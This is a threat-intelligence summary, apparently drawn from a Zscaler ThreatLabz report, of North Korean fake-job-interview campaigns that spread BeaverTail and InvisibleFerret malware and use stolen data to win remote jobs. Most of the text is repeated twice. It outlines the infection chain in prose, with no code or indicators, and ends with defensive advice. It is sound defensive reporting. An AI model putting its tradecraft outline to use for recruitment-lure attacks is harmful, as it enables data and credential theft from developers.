From Pyongyang to Your Payroll: The Rise of North Korean Remote Workers in the West
Summary:
In November 2023, a security vendor discovered that North Korean threat actors were using the Contagious Interview and WageMole campaigns to procure remote employment opportunities in Western countries, thus evading the financial sanctions against North Korea (DPRK). The main goal of Contagious Interview is data theft, while WageMole’s objective is to utilize the Contagious Interview stolen data and social engineering tactics to help these North Korea-aligned threat actors land remote jobs and perform cyberespionage. Zscalar ThreatLabz, through recent analysis, has uncovered improvements and updates in the adversary’s campaign tactics accomplished through improved script obfuscation and expansion of their reach by incorporating the different file types of Windows Installers and macOS apps disguised as chat applications as their initial infection vector. ThreatLabz monitored the installed BeaverTail and InvisibleFerret malware during the infection chain and confirmed the attackers stole source code, cryptocurrency data, and personal information from over 100 victim devices on different operating systems. BeaverTail incorporates a new obfuscation technique that utilizes a JavaScript obfuscator to mask its functionality.
In recently observed activity documented by ThreatLabz, the threat actor posted a Full Stack job opening on part-time hiring platforms. As part of the adversary’s interview process for potential employees, applicants were directed to GitHub to solve a coding problem. However, this repository controlled by the attacker hosts BeaverTail malware. Contagious Interview specifically targets web, AI, and cryptocurrency developers and heavily relies on platforms like GitHub for hosting malicious files. In some cases, additional malicious code is retrieved from attacker-controlled servers and dynamically executed by extracting the cookie property from the fetched JSON data and ran via the eval function. This highlights the effort the threat actor has put into evading detection. The BeaverTail python script downloads additional payloads including the main backdoor script Invisible Ferret. The threat actor typically exfiltrates basic system information, PDF documents, image files, and source code using one of InvisibleFerret’s main components. Source code is often a target because developers sometimes store credentials such as login IDs and passwords in plain text. In August 2024, the InvisibleFerret malware author added new backdoor commands, additional exfiltration targets, and communication channels. WageMole threat actors utilize this Contagious Interview stolen data to acquire remote work in countries like the United States.
Security Officer Comments:
This recent activity from these campaigns highlights the ever-improving nature of nation state-aligned threats. The adversary has expanded the reach of their attacks by leveraging masqueraded installers and applications on Windows and macOS. The cyclical nature of these infection chains allows the threat actor to build success off of previous attacks. DPRK threat actors will continue to find effective ways to steal funds and perform cyberespionage for the North Korean Regime. With the vast amount of resources available to these actors, this sophisticated threat can be difficult to proactively defend against. With refined obfuscation techniques, multi-platform compatibility, and widespread data theft, these campaigns represent a growing threat to businesses and individuals alike.
Suggested Corrections:
IOCs:
Contagious Interview
WageMole
How to defend against Contagious Interview
https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west
In November 2023, a security vendor discovered that North Korean threat actors were using the Contagious Interview and WageMole campaigns to procure remote employment opportunities in Western countries, thus evading the financial sanctions against North Korea (DPRK). The main goal of Contagious Interview is data theft, while WageMole’s objective is to utilize the Contagious Interview stolen data and social engineering tactics to help these North Korea-aligned threat actors land remote jobs and perform cyberespionage. Zscalar ThreatLabz, through recent analysis, has uncovered improvements and updates in the adversary’s campaign tactics accomplished through improved script obfuscation and expansion of their reach by incorporating the different file types of Windows Installers and macOS apps disguised as chat applications as their initial infection vector. ThreatLabz monitored the installed BeaverTail and InvisibleFerret malware during the infection chain and confirmed the attackers stole source code, cryptocurrency data, and personal information from over 100 victim devices on different operating systems. BeaverTail incorporates a new obfuscation technique that utilizes a JavaScript obfuscator to mask its functionality.
In recently observed activity documented by ThreatLabz, the threat actor posted a Full Stack job opening on part-time hiring platforms. As part of the adversary’s interview process for potential employees, applicants were directed to GitHub to solve a coding problem. However, this repository controlled by the attacker hosts BeaverTail malware. Contagious Interview specifically targets web, AI, and cryptocurrency developers and heavily relies on platforms like GitHub for hosting malicious files. In some cases, additional malicious code is retrieved from attacker-controlled servers and dynamically executed by extracting the cookie property from the fetched JSON data and ran via the eval function. This highlights the effort the threat actor has put into evading detection. The BeaverTail python script downloads additional payloads including the main backdoor script Invisible Ferret. The threat actor typically exfiltrates basic system information, PDF documents, image files, and source code using one of InvisibleFerret’s main components. Source code is often a target because developers sometimes store credentials such as login IDs and passwords in plain text. In August 2024, the InvisibleFerret malware author added new backdoor commands, additional exfiltration targets, and communication channels. WageMole threat actors utilize this Contagious Interview stolen data to acquire remote work in countries like the United States.
Security Officer Comments:
This recent activity from these campaigns highlights the ever-improving nature of nation state-aligned threats. The adversary has expanded the reach of their attacks by leveraging masqueraded installers and applications on Windows and macOS. The cyclical nature of these infection chains allows the threat actor to build success off of previous attacks. DPRK threat actors will continue to find effective ways to steal funds and perform cyberespionage for the North Korean Regime. With the vast amount of resources available to these actors, this sophisticated threat can be difficult to proactively defend against. With refined obfuscation techniques, multi-platform compatibility, and widespread data theft, these campaigns represent a growing threat to businesses and individuals alike.
Suggested Corrections:
IOCs:
Contagious Interview
WageMole
How to defend against Contagious Interview
- Review and monitor any executions or connections associated with the indicators we have provided in the Indicators of Compromise (IOCs) section.
- Never save sensitive information, such as login credentials or cryptocurrency keys, in plain text.
- Avoid storing personal information, including passports, identity cards, and other sensitive details, insecurely.
- Exercise caution when contacted by unknown individuals.
- Always execute suspicious files in a virtual environment.
- Review and monitor any contacts from the email and social media accounts we have provided in the Indicators of Compromise (IOCs) section.
- Verify employment history by directly confirming the candidate's role and tenure with the company listed on their resume.
- Ensure new hires have limited access to sensitive information and systems until they have successfully completed the probationary period.
- Conduct a detailed background check, including education, employment history, and any relevant professional certifications.
- Verify the applicant’s work history locations to ensure that they are credible and consistent.
- Carefully examine and verify all provided identification documents to ensure authenticity and prevent identity fraud.
https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west